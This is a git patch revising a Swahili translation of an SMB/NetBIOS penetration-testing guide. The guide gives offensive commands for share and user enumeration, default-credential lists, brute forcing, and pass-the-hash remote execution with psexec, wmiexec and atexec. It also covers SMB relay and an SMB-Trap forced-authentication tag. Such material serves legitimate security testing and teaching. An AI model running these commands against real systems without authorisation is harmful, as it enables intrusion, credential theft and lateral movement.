From 3ccbb9fa7733fd2bb4ff6f291358e5dfc009de4d Mon Sep 17 00:00:00 2001 From: Translator Date: Mon, 8 Sep 2025 06:21:35 +0000 Subject: [PATCH] Translated ['src/network-services-pentesting/pentesting-smb/README.md', --- src/SUMMARY.md | 1 + .../pentesting-smb/README.md | 197 ++++++++-------- ...bd-attack-surface-and-fuzzing-syzkaller.md | 219 ++++++++++++++++++ 3 files changed, 322 insertions(+), 95 deletions(-) create mode 100644 src/network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 793c88a81..b18b11ccd 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -494,6 +494,7 @@ - [135, 593 - Pentesting MSRPC](network-services-pentesting/135-pentesting-msrpc.md) - [137,138,139 - Pentesting NetBios](network-services-pentesting/137-138-139-pentesting-netbios.md) - [139,445 - Pentesting SMB](network-services-pentesting/pentesting-smb/README.md) + - [Ksmbd Attack Surface And Fuzzing Syzkaller](network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md) - [rpcclient enumeration](network-services-pentesting/pentesting-smb/rpcclient-enumeration.md) - [143,993 - Pentesting IMAP](network-services-pentesting/pentesting-imap.md) - [161,162,10161,10162/udp - Pentesting SNMP](network-services-pentesting/pentesting-snmp/README.md) diff --git a/src/network-services-pentesting/pentesting-smb/README.md b/src/network-services-pentesting/pentesting-smb/README.md index 2b8366dfb..c55f9e3db 100644 --- a/src/network-services-pentesting/pentesting-smb/README.md +++ b/src/network-services-pentesting/pentesting-smb/README.md @@ -4,61 +4,60 @@ ## **Port 139** -_**Network Basic Input Output System**_** (NetBIOS)** ni protokali ya programu iliyoundwa kuwezesha programu, PCs, na Desktops ndani ya mtandao wa eneo la ndani (LAN) kuingiliana na vifaa vya mtandao na **kuwezesha uhamasishaji wa data kupitia mtandao**. Utambuzi na eneo la programu za programu zinazofanya kazi kwenye mtandao wa NetBIOS unafanywa kupitia majina yao ya NetBIOS, ambayo yanaweza kuwa na urefu wa hadi herufi 16 na mara nyingi ni tofauti na jina la kompyuta. Kikao cha NetBIOS kati ya programu mbili kinaanzishwa wakati programu moja (ikienda kama mteja) inatoa amri ya "kuita" programu nyingine (ikienda kama seva) ikitumia **TCP Port 139**. +_**Network Basic Input Output System**_** (NetBIOS)** ni itifaki ya programu iliyoundwa kuwezesha programu, PCs, na desktops ndani ya local area network (LAN) kuingiliana na vifaa vya mtandao na **kuwezesha usafirishaji wa data kwenye mtandao**. Utambuzi na eneo la programu zinazofanya kazi kwenye mtandao wa NetBIOS hufikiwa kupitia majina yao ya NetBIOS, ambayo yanaweza kuwa na herufi hadi 16 kwa urefu na mara nyingi yanatofautiana na jina la kompyuta. Kikao cha NetBIOS kati ya programu mbili kinaanzishwa wakati programu moja (acting as the client) inatoa amri ya "call" kwa programu nyingine (acting as the server) ikitumia **TCP Port 139**. ``` 139/tcp open netbios-ssn Microsoft Windows netbios-ssn ``` ## Port 445 -Kitaalamu, Port 139 inajulikana kama ‘NBT over IP’, wakati Port 445 inatambulika kama ‘SMB over IP’. Kifupi **SMB** kinamaanisha ‘**Server Message Blocks**’, ambacho pia kinajulikana kisasa kama **Common Internet File System (CIFS)**. Kama itifaki ya mtandao ya kiwango cha programu, SMB/CIFS inatumika hasa kuwezesha ufikiaji wa pamoja wa faili, printers, serial ports, na kuwezesha aina mbalimbali za mawasiliano kati ya nodi kwenye mtandao. +Kiufundi, Port 139 inatajwa kama ‘NBT over IP’, wakati Port 445 inatambulika kama ‘SMB over IP’. Akronimu **SMB** inamaanisha ‘**Server Message Blocks**’, ambayo pia kwa sasa inajulikana kama **Common Internet File System (CIFS)**. Kwa kuwa ni protocol ya application-layer ya mtandao, SMB/CIFS hutumika hasa kuwezesha ufikiaji wa pamoja wa faili, vichapishi, bandari za serial, na kurahisisha aina mbalimbali za mawasiliano kati ya nodi kwenye mtandao. -Kwa mfano, katika muktadha wa Windows, inasisitizwa kwamba SMB inaweza kufanya kazi moja kwa moja juu ya TCP/IP, ikiondoa hitaji la NetBIOS juu ya TCP/IP, kupitia matumizi ya port 445. Kinyume chake, kwenye mifumo tofauti, matumizi ya port 139 yanaonekana, ikionyesha kwamba SMB inatekelezwa pamoja na NetBIOS juu ya TCP/IP. +Kwa mfano, katika muktadha wa Windows, inabainishwa kwamba SMB inaweza kufanya kazi moja kwa moja juu ya TCP/IP, ikiondoa uhitaji wa NetBIOS over TCP/IP, kwa kutumia port 445. Kinyume chake, kwenye mifumo mingine, matumizi ya port 139 yanaonekana, kuonyesha kwamba SMB inaendeshwa pamoja na NetBIOS over TCP/IP. ``` 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) ``` ### SMB -Protokali ya **Server Message Block (SMB)**, inayofanya kazi katika mfano wa **mteja-server**, imeundwa kwa ajili ya kudhibiti **ufikiaji wa faili**, directories, na rasilimali nyingine za mtandao kama printers na routers. Kimsingi inatumika ndani ya mfululizo wa mifumo ya uendeshaji ya **Windows**, SMB inahakikisha ufanisi wa nyuma, ikiruhusu vifaa vyenye toleo jipya la mfumo wa uendeshaji wa Microsoft kuingiliana kwa urahisi na vile vinavyotumia toleo la zamani. Zaidi ya hayo, mradi wa **Samba** unatoa suluhisho la programu ya bure, linalowezesha utekelezaji wa SMB kwenye mifumo ya **Linux** na Unix, hivyo kurahisisha mawasiliano kati ya majukwaa kupitia SMB. +Itifaki ya **Server Message Block (SMB)**, inayofanya kazi kwa muundo wa **client-server**, imeundwa kudhibiti **ufikiaji wa faili**, saraka, na rasilimali nyingine za mtandao kama vichapishaji na routers. Inatumiwa hasa ndani ya mfululizo wa mfumo wa uendeshaji wa **Windows**, SMB inahakikisha utangamano wa nyuma, ikiruhusu vifaa vilivyo na matoleo mapya ya mfumo wa uendeshaji wa Microsoft kuingiliana bila mshono na vilivyoendesha matoleo ya zamani. Zaidi ya hayo, mradi wa **Samba** unatoa suluhisho la programu huru, likiwezesha utekelezaji wa SMB kwenye mifumo ya **Linux** na Unix, na hivyo kurahisisha mawasiliano ya majukwaa mbalimbali kupitia SMB. -Hisa, zinazoakisi **sehemu za kiholela za mfumo wa faili wa ndani**, zinaweza kutolewa na seva ya SMB, na kufanya hiyerarhii ionekane kwa mteja kwa sehemu **huru** kutoka kwa muundo halisi wa seva. **Access Control Lists (ACLs)**, ambazo zinaelezea **haki za ufikiaji**, zinaruhusu **udhibiti wa kina** juu ya ruhusa za watumiaji, ikiwa ni pamoja na sifa kama **`execute`**, **`read`**, na **`full access`**. Ruhusa hizi zinaweza kutolewa kwa watumiaji binafsi au vikundi, kulingana na hisa, na ni tofauti na ruhusa za ndani zilizowekwa kwenye seva. +Shares, zinazo wakilisha **sehemu yoyote ya mfumo wa faili wa ndani**, zinaweza kutolewa na server ya SMB, na kufanya muundo wa mviringo uonyeshewe kwa mteja kwa sehemu **huru** kutoka kwa muundo halisi wa server. The **Access Control Lists (ACLs)**, ambazo zinafafanua **haki za ufikiaji**, zinaruhusu **udhibiti wa kina** juu ya ruhusa za watumiaji, ikijumuisha sifa kama **`execute`**, **`read`**, na **`full access`**. Ruhusa hizi zinaweza kupewa watumiaji binafsi au vikundi, kulingana na shares, na ni tofauti na ruhusa za ndani zilizowekwa kwenye server. ### IPC$ Share -Ufikiaji wa hisa ya IPC$ unaweza kupatikana kupitia kikao cha kutokujulikana, ikiruhusu mwingiliano na huduma zinazofichuliwa kupitia mabomba yaliyopewa majina. Chombo `enum4linux` ni muhimu kwa kusudi hili. Ikitumika ipasavyo, inaruhusu kupata: +Ufikiaji wa IPC$ share unaweza kupatikana kupitia anonymous null session, kuruhusu mwingiliano na huduma zinazofunguliwa kupitia named pipes. Utility `enum4linux` ni muhimu kwa madhumuni haya. Ikiwa itatumika vizuri, inaruhusu kupata: - Taarifa kuhusu mfumo wa uendeshaji - Maelezo kuhusu domain ya mzazi -- Mkusanyiko wa watumiaji na vikundi vya ndani -- Taarifa kuhusu hisa za SMB zinazopatikana -- Sera ya usalama wa mfumo inayofanya kazi +- Orodha ya watumiaji na vikundi vya ndani +- Taarifa kuhusu SMB shares zilizopo +- Sera ya usalama ya mfumo inayotekelezeka -Funguo hii ni muhimu kwa wasimamizi wa mtandao na wataalamu wa usalama kutathmini hali ya usalama ya huduma za SMB (Server Message Block) kwenye mtandao. `enum4linux` inatoa mtazamo mpana wa mazingira ya SMB ya mfumo lengwa, ambayo ni muhimu kwa kutambua udhaifu wa uwezekano na kuhakikisha kwamba huduma za SMB zimehifadhiwa ipasavyo. +Kazi hii ni muhimu kwa wasimamizi wa mtandao na wataalam wa usalama kutathmini hali ya usalama ya huduma za SMB (Server Message Block) kwenye mtandao. `enum4linux` hutoa mtazamo kamili wa mazingira ya SMB ya mfumo lengwa, jambo muhimu kwa kubaini udhaifu unaowezekana na kuhakikisha kuwa huduma za SMB zimewekwa salama ipasavyo. ```bash enum4linux -a target_ip ``` -Amri ya juu ni mfano wa jinsi `enum4linux` inaweza kutumika kufanya uainishaji kamili dhidi ya lengo lililobainishwa na `target_ip`. +Amri iliyotangulia ni mfano wa jinsi `enum4linux` inaweza kutumika kufanya full enumeration dhidi ya lengo lililobainishwa na `target_ip`. -## Nini maana ya NTLM - -Ikiwa hujui nini maana ya NTLM au unataka kujua jinsi inavyofanya kazi na jinsi ya kuitumia vibaya, utapata ukurasa huu kuhusu **NTLM** kuwa wa kuvutia sana ambapo inaelezwa **jinsi protokali hii inavyofanya kazi na jinsi unavyoweza kuitumia:** +## NTLM ni nini +Kama haujui NTLM ni nini au unataka kujua jinsi inavyofanya kazi na jinsi ya kuitumia vibaya, utapata ukurasa huu kuhusu **NTLM** kuwa wa kuvutia sana ambapo umeelezwa **jinsi protocol hii inavyofanya kazi na jinsi unavyoweza kuinufaisha:** {{#ref}} ../../windows-hardening/ntlm/ {{#endref}} -## **Uainishaji wa Server** +## **Server Enumeration** -### **Scan** mtandao ukitafuta mwenyeji: +### **Scan** mtandao kutafuta hosts: ```bash nbtscan -r 192.168.0.1/24 ``` -### SMB server version +### Toleo la server la SMB -Ili kutafuta uwezekano wa kutumia udhaifu kwenye toleo la SMB, ni muhimu kujua ni toleo gani linatumika. Ikiwa taarifa hii haitokei katika zana nyingine zinazotumika, unaweza: +Ili kutafuta exploits zinazowezekana kwa toleo la SMB, ni muhimu kujua toleo linayotumika. Ikiwa taarifa hii haitokei katika zana nyingine ulizotumia, unaweza: -- Tumia moduli ya **MSF** ya ziada `**auxiliary/scanner/smb/smb_version**` -- Au skripti hii: +- Tumia **MSF** auxiliary module `**auxiliary/scanner/smb/smb_version**` +- Ama script hii: ```bash #!/bin/sh #Author: rewardone @@ -80,19 +79,19 @@ echo "" && sleep .1 msf> search type:exploit platform:windows target:2008 smb searchsploit microsoft smb ``` -### **Mikopo** Inayowezekana +### **Inawezekana** Credentials -| **Jina la mtumiaji(s)** | **Nywila za kawaida** | -| ------------------------ | ----------------------------------------- | -| _(bila)_ | _(bila)_ | -| mgeni | _(bila)_ | -| Msimamizi, admin | _(bila)_, nywila, msimamizi, admin | -| arcserve | arcserve, backup | -| tivoli, tmersrvd | tivoli, tmersrvd, admin | -| backupexec, backup | backupexec, backup, arcada | -| jaribio, maabara, onyesho | nywila, jaribio, maabara, onyesho | +| **Username(s)** | **Common passwords** | +| -------------------- | ----------------------------------------- | +| _(blank)_ | _(blank)_ | +| guest | _(blank)_ | +| Administrator, admin | _(blank)_, password, administrator, admin | +| arcserve | arcserve, backup | +| tivoli, tmersrvd | tivoli, tmersrvd, admin | +| backupexec, backup | backupexec, backup, arcada | +| test, lab, demo | password, test, lab, demo | -### Nguvu ya Brute +### Brute Force - [**SMB Brute Force**](../../generic-hacking/brute-force.md#smb) @@ -120,9 +119,9 @@ rpcclient -U "username%passwd" #With creds /usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@] /usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@] ``` -### Orodha ya Watumiaji, Vikundi & Watumiaji Walioingia +### Orodhesha Watumiaji, Makundi & Watumiaji Walioingia -Taarifa hii inapaswa kuwa tayari imekusanywa kutoka kwa enum4linux na enum4linux-ng +Taarifa hizi zinapaswa tayari kuwa zimekusanywa kutoka enum4linux na enum4linux-ng ```bash crackmapexec smb 10.10.10.10 --users [-u -p ] crackmapexec smb 10.10.10.10 --groups [-u -p ] @@ -140,17 +139,17 @@ enumdomgroups ```bash lookupsid.py -no-pass hostname.local ``` -Oneliner +Mstari mmoja ```bash for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done ``` -### Metasploit - Kuorodhesha watumiaji wa ndani +### Metasploit - Enumerate watumiaji wa ndani ```bash use auxiliary/scanner/smb/smb_lookupsid set rhosts hostname.local run ``` -### **Kuhesabu LSARPC na SAMR rpcclient** +### **Kuorodhesha LSARPC and SAMR rpcclient** {{#ref}} @@ -159,19 +158,19 @@ rpcclient-enumeration.md ### Muunganisho wa GUI kutoka linux -#### Katika terminali: +#### Kwenye terminali: `xdg-open smb://cascade.htb/` -#### Katika dirisha la kivinjari cha faili (nautilus, thunar, nk) +#### Katika dirisha la kivinjari cha faili (nautilus, thunar, etc) `smb://friendzone.htb/general/` -## Kuhesabu Folda Zilizoshirikiwa +## Kuorodhesha Folda Zilizoshirikishwa -### Orodha ya folda zilizoshirikiwa +### Orodhesha folda ziloshirikishwa -Kila wakati inashauriwa kuangalia kama unaweza kufikia chochote, ikiwa huna akidi jaribu kutumia **null** **credentials/mtembezi wa wageni**. +Inashauriwa kila wakati kuangalia ikiwa unaweza kupata chochote, ikiwa huna credentials jaribu kutumia **null** **credentials/guest user**. ```bash smbclient --no-pass -L // # Null user smbclient -U 'username[%passwd]' -L [--pw-nt-hash] // #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash @@ -185,7 +184,7 @@ crackmapexec smb -u '' -p '' --shares #Null user crackmapexec smb -u 'username' -p 'password' --shares #Guest user crackmapexec smb -u 'username' -H '' --shares #Guest user ``` -### **Unganisha/Ondoa orodha ya folda iliyo shirikiwa** +### **Unganisha/Orodhesha folda iliyoshirikiwa** ```bash #Connect using smbclient smbclient --no-pass /// @@ -197,11 +196,13 @@ smbmap [-u "username" -p "password"] -R [Folder] -H [-P ] # Recursive smbmap [-u "username" -p "password"] -r [Folder] -H [-P ] # Non-Recursive list smbmap -u "username" -p ":" [-r/-R] [Folder] -H [-P ] #Pass-the-Hash ``` -### **Kuhesabu kwa mikono sehemu za windows na kuungana nazo** +### **Hesabu kwa mkono windows shares na kujiunga nazo** -Inaweza kuwa inawezekana kwamba umepigwa marufuku kuonyesha sehemu zozote za mashine ya mwenyeji na unapojaribu kuorodhesha zinaonekana kana kwamba hakuna sehemu za kuungana nazo. Hivyo inaweza kuwa na maana kujaribu kuungana kwa mikono na sehemu. Ili kuhesabu sehemu hizo kwa mikono unaweza kutaka kutafuta majibu kama NT_STATUS_ACCESS_DENIED na NT_STATUS_BAD_NETWORK_NAME, unapokuwa unatumia kikao halali (mfano, kikao kisicho na maudhui au akidi halali). Haya yanaweza kuashiria ikiwa sehemu hiyo ipo na huna ufaccess au sehemu hiyo haipo kabisa. +Inawezekana umezuiliwa kuonyesha shares zozote za mashine ya mwenyeji na unapojaribu kuorodhesha zinaonekana kana kwamba hakuna shares za kuunganishwa. Kwa hivyo inaweza kuwa vyema kujaribu kwa haraka kuunganishwa kwa mkono na share. -Majina ya kawaida ya sehemu kwa malengo ya windows ni +Ili kuhesabu shares kwa mkono unaweza kutaka kutazama majibu kama NT_STATUS_ACCESS_DENIED na NT_STATUS_BAD_NETWORK_NAME, wakati unatumia session halali (mf. null session au valid credentials). Hizi zinaweza kuonyesha kama share ipo na huna ufikiaji kwake au share haipo kabisa. + +Majina ya shares ya kawaida kwa targets za Windows ni - C$ - D$ @@ -212,14 +213,14 @@ Majina ya kawaida ya sehemu kwa malengo ya windows ni - SYSVOL - NETLOGON -(Majina ya kawaida ya sehemu kutoka _**Network Security Assessment 3rd edition**_) +(Common share names from _**Network Security Assessment 3rd edition**_) -Unaweza kujaribu kuungana nazo kwa kutumia amri ifuatayo +Unaweza kujaribu kujiunga nao kwa kutumia amri ifuatayo ```bash smbclient -U '%' -N \\\\\\ # null session to connect to a windows share smbclient -U '' \\\\\\ # authenticated session to connect to a windows share (you will be prompted for a password) ``` -au kwa ajili ya script hii (ikitumia kikao kisicho na thamani) +au script hii (ikitumia null session) ```bash #/bin/bash @@ -236,12 +237,12 @@ echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD fi done ``` -mfano +mifano ```bash smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session ``` -### **Kukadiria sehemu kutoka Windows / bila zana za upande wa tatu** +### **Orodhesha shares kutoka Windows / bila zana za pande za tatu** PowerShell ```bash @@ -267,16 +268,16 @@ fsmgmt.msc # Computer Management: Computer Management > System Tools > Shared Folders > Shares compmgmt.msc ``` -explorer.exe (grafiki), ingiza `\\\` kuona sehemu za kushiriki zisizo na siri. +explorer.exe (graphical), ingiza `\\\` ili kuona shares zisizo zilizofichwa zinazopatikana. -### Pandisha folda iliyo na sehemu ya pamoja +### Unganisha folda iliyoshirikiwa ```bash mount -t cifs //x.x.x.x/share /mnt/share mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share ``` ### **Pakua faili** -Soma sehemu za awali kujifunza jinsi ya kuungana na akiba/Pass-the-Hash. +Soma sehemu zilizopita ili ujifunze jinsi ya kuungana kwa kutumia credentials/Pass-the-Hash. ```bash #Search a file and download sudo smbmap -R Folder -H -A -q # Search the file in recursive mode and download it inside /usr/share/smbmap @@ -293,14 +294,14 @@ smbclient /// ``` Amri: -- mask: inabainisha mask inayotumika kuchuja faili ndani ya directory (mfano: "" kwa faili zote) -- recurse: inawasha recursion (kawaida: off) -- prompt: inawasha kuomba majina ya faili (kawaida: on) -- mget: inakopi faili zote zinazolingana na mask kutoka kwa mwenyeji hadi mashine ya mteja +- mask: inaeleza mask ambayo inatumika kuchuja faili ndani ya saraka (e.g. "" for all files) +- recurse: huweka au huzima recursion (chaguo-msingi: off) +- prompt: huweka au huzima prompt ya majina ya faili (chaguo-msingi: on) +- mget: inakopa faili zote zinazolingana na mask kutoka host kwenda client machine -(_Taarifa kutoka kwa manpage ya smbclient_) +(_Taarifa kutoka kwenye manpage ya smbclient_) -### Utafutaji wa Folda za Kikoa Zilizoshirikiwa +### Utafutaji wa Folda Zilizoshirikiwa za Domain - [**Snaffler**](https://github.com/SnaffCon/Snaffler) ```bash @@ -312,15 +313,15 @@ Snaffler.exe -s -d domain.local -o snaffler.log -v data ```bash sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares' ``` -Hasa ya kuvutia kutoka kwa sehemu ni faili zinazoitwa **`Registry.xml`** kwani zinaweza **kuhifadhi nywila** za watumiaji walioanzishwa na **autologon** kupitia Sera ya Kundi. Au faili za **`web.config`** kwani zina **akidi**. +Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials. > [!TIP] -> **SYSVOL share** inapatikana **kusomwa** na watumiaji wote walioidhinishwa katika eneo. Ndani yake unaweza **kupata** batch nyingi tofauti, VBScript, na **scripts** za PowerShell.\ -> Unapaswa **kuangalia** **scripts** ndani yake kwani unaweza **kupata** taarifa nyeti kama vile **nywila**. +> Sehemu ya **SYSVOL share** inaweza kusomwa na watumiaji wote walioidhinishwa ndani ya domain. Ndani yake unaweza **kupata** aina nyingi za batch, VBScript, na PowerShell **scripts**.\ +> Unapaswa **kuangalia** **scripts** zilizomo ndani yake kwani unaweza **kupata** taarifa nyeti kama **passwords**. ## Soma Registry -Unaweza kuwa na uwezo wa **kusoma registry** ukitumia baadhi ya akidi zilizogunduliwa. Impacket **`reg.py`** inakuwezesha kujaribu: +Unaweza kuwa na uwezo wa **kusoma registry** ukitumia credentials ulizogundua. Impacket **`reg.py`** inakuwezesha kujaribu: ```bash sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s @@ -328,35 +329,35 @@ sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a87 ``` ## Post Exploitation -**Mipangilio ya default ya** **Samba** server kwa kawaida hupatikana katika `/etc/samba/smb.conf` na inaweza kuwa na **mipangilio hatari**: +**Mpangilio chaguo-msingi** cha **Samba** seva kwa kawaida hupatikana katika `/etc/samba/smb.conf` na linaweza kuwa na baadhi ya **mpangilio hatari**: -| **Mipangilio** | **Maelezo** | +| **Mpangilio** | **Maelezo** | | --------------------------- | ------------------------------------------------------------------- | -| `browseable = yes` | Ruhusu orodha ya sehemu zinazopatikana katika sehemu ya sasa? | -| `read only = no` | Kataza uundaji na mabadiliko ya faili? | -| `writable = yes` | Ruhusu watumiaji kuunda na kubadilisha faili? | -| `guest ok = yes` | Ruhusu kuungana na huduma bila kutumia nenosiri? | -| `enable privileges = yes` | Heshimu mamlaka yaliyotolewa kwa SID maalum? | -| `create mask = 0777` | Ni ruhusa gani zinapaswa kutolewa kwa faili mpya zilizoundwa? | -| `directory mask = 0777` | Ni ruhusa gani zinapaswa kutolewa kwa directories mpya zilizoundwa?| -| `logon script = script.sh` | Ni script gani inahitaji kutekelezwa wakati wa kuingia kwa mtumiaji?| -| `magic script = script.sh` | Ni script ipi inapaswa kutekelezwa script inapofungwa? | -| `magic output = script.out` | Wapi matokeo ya script ya kichawi yanapaswa kuhifadhiwa? | +| `browseable = yes` | Je, inaruhusu kuorodhesha shares zinazopatikana kwenye share ya sasa? | +| `read only = no` | Je, inazuia uundaji na mabadiliko ya faili? | +| `writable = yes` | Je, inaruhusu watumiaji kuunda na kubadilisha faili? | +| `guest ok = yes` | Je, inaruhusu kuunganishwa na huduma bila kutumia nywila? | +| `enable privileges = yes` | Je, inaheshimu privileges zilizotengwa kwa SID maalum? | +| `create mask = 0777` | Ni ruhusa gani zinapaswa kupewa faili zilizoundwa hivi karibuni? | +| `directory mask = 0777` | Ni ruhusa gani zinapaswa kupewa saraka zilizoundwa hivi karibuni? | +| `logon script = script.sh` | Ni script gani inapaswa kutekelezwa wakati wa kuingia kwa mtumiaji? | +| `magic script = script.sh` | Ni script gani inapaswa kutekelezwa wakati script inapofungwa? | +| `magic output = script.out` | Wapi pato la magic script linapaswa kuhifadhiwa? | -Amri `smbstatus` inatoa taarifa kuhusu **server** na kuhusu **nani ameungana**. +Amri `smbstatus` inatoa taarifa kuhusu **seva** na kuhusu **ni nani ameunganishwa**. -## Authenticate using Kerberos +## Thibitisha kwa kutumia Kerberos -Unaweza **kujiandikisha** kwa **kerberos** kwa kutumia zana **smbclient** na **rpcclient**: +Unaweza **kuthibitisha** kwa **kerberos** kwa kutumia zana **smbclient** na **rpcclient**: ```bash smbclient --kerberos //ws01win10.domain.com/C$ rpcclient -k ws01win10.domain.com ``` -## **Teua Amri** +## **Tekeleza Amri** ### **crackmapexec** -crackmapexec inaweza kutekeleza amri **kwa kutumia** yoyote ya **mmcexec, smbexec, atexec, wmiexec** ambapo **wmiexec** ndiyo njia **ya kawaida**. Unaweza kuashiria chaguo unalopendelea kutumia kwa kutumia parameter `--exec-method`: +crackmapexec inaweza kutekeleza amri **ikitumia** yoyote ya **mmcexec, smbexec, atexec, wmiexec**, ambapo **wmiexec** ndiyo mbinu ya **default**. Unaweza kuonyesha chaguo unalopendelea kutumia kwa kigezo `--exec-method`: ```bash apt-get install crackmapexec @@ -380,7 +381,7 @@ crackmapexec smb -d -u Administrator -H #Pass-The-Hash ``` ### [**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/lateral-movement/smbexec.md) -Chaguo zote mbili zita **unda huduma mpya** (kwa kutumia _\pipe\svcctl_ kupitia SMB) kwenye mashine ya mwathirika na kuitumia **kutekeleza kitu** (**psexec** it **pakia** faili la executable kwenye ADMIN$ share na **smbexec** itaanika **cmd.exe/powershell.exe** na kuweka katika hoja payload --**mbinu isiyo na faili-**-).\ +Chaguzi zote mbili zitatengeneza **huduma mpya** (kutumia _\pipe\svcctl_ via SMB) kwenye mashine ya mwathiriwa na kuitumia **kutekeleza kitu** (**psexec** ita **upload** executable file kwenye ADMIN$ share na **smbexec** itaelekeza kwa **cmd.exe/powershell.exe** na kuweka katika arguments the payload --**file-less technique-**-).\ **Maelezo zaidi** kuhusu [**psexec** ](../../windows-hardening/lateral-movement/psexec-and-winexec.md)na [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md).\ Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/ ```bash @@ -390,19 +391,19 @@ Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/ psexec \\192.168.122.66 -u Administrator -p 123456Ww psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash ``` -Kwa kutumia **parameter**`-k` unaweza kuthibitisha dhidi ya **kerberos** badala ya **NTLM** +Kwa kutumia **parameter**`-k` unaweza kuthibitisha kwa **kerberos** badala ya **NTLM** ### [wmiexec](../../windows-hardening/lateral-movement/wmiexec.md)/dcomexec -Fanya kazi ya amri kwa siri bila kugusa diski au kuendesha huduma mpya kwa kutumia DCOM kupitia **port 135.**\ -Katika **kali** inapatikana kwenye /usr/share/doc/python3-impacket/examples/ +Endesha kwa siri command shell bila kugusa disk au kuendesha service mpya kwa kutumia DCOM kupitia **port 135.**\ +Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/ ```bash #If no password is provided, it will be prompted ./wmiexec.py [[domain/]username[:password]@] #Prompt for password ./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted ``` -Kwa kutumia **parameter**`-k` unaweza kuthibitisha dhidi ya **kerberos** badala ya **NTLM** +Kwa kutumia **parameter**`-k` unaweza authenticate dhidi ya **kerberos** badala ya **NTLM** ```bash #If no password is provided, it will be prompted ./dcomexec.py [[domain/]username[:password]@] @@ -411,40 +412,46 @@ Kwa kutumia **parameter**`-k` unaweza kuthibitisha dhidi ya **kerberos** badala ``` ### [AtExec](../../windows-hardening/lateral-movement/atexec.md) -Tekeleza amri kupitia Mipango ya Kazi (ukitumia _\pipe\atsvc_ kupitia SMB).\ +Tekeleza amri kupitia Task Scheduler (kutumia _\pipe\atsvc_ kupitia SMB).\ Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/ ```bash ./atexec.py [[domain/]username[:password]@] "command" ./atexec.py -hashes administrator@10.10.10.175 "whoami" ``` -## Impacket reference +## Marejeo ya Impacket [https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/) -## **Kujaribu nguvu akauti za watumiaji** +### ksmbd attack surface and SMB2/SMB3 protocol fuzzing (syzkaller) -**Hii haipendekezwi, unaweza kufunga akaunti ikiwa utaongeza majaribio yaliyoruhusiwa** +{{#ref}} +ksmbd-attack-surface-and-fuzzing-syzkaller.md +{{#endref}} + +## **Bruteforce taarifa za kuingia za watumiaji** + +**Hii haipendekezwi, unaweza kuzuia akaunti ikiwa utavuka idadi ya jaribio zilizoruhusiwa** ```bash nmap --script smb-brute -p 445 ridenum.py 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name ``` ## SMB relay attack -Huu shambulio unatumia zana ya Responder ili **kukamata vikao vya uthibitishaji vya SMB** kwenye mtandao wa ndani, na **kupeleka** kwa **mashine lengwa**. Ikiwa **sehemu ya uthibitishaji inafanikiwa**, itakushusha moja kwa moja kwenye **sistimu** **shell**.\ -[**Taarifa zaidi kuhusu shambulio hili hapa.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) +Shambulio hili linatumia Responder toolkit ili **capture SMB authentication sessions** kwenye mtandao wa ndani, na **relays** them kwa **target machine**. Ikiwa authentication **session is successful**, it itaweka wewe moja kwa moja ndani ya **system** **shell**.\ +[**More information about this attack here.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) ## SMB-Trap -Maktaba ya Windows URLMon.dll inajaribu moja kwa moja kuthibitisha kwa mwenyeji wakati ukurasa unajaribu kufikia maudhui fulani kupitia SMB, kwa mfano: `img src="\\10.10.10.10\path\image.jpg"` +Maktaba ya Windows URLMon.dll hujaribu kiotomatiki authenticate kwa host wakati ukurasa unajaribu kufikia baadhi ya content kupitia SMB, kwa mfano: `img src="\\10.10.10.10\path\image.jpg"` -Hii inatokea na kazi: +This happens with the functions: - URLDownloadToFile - URLDownloadToCache - URLOpenStream - URLOpenBlockingStream -Ambazo zinatumika na baadhi ya vivinjari na zana (kama Skype) +Which are used by some browsers and tools (like Skype) ![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../images/image (358).png>) @@ -454,7 +461,7 @@ 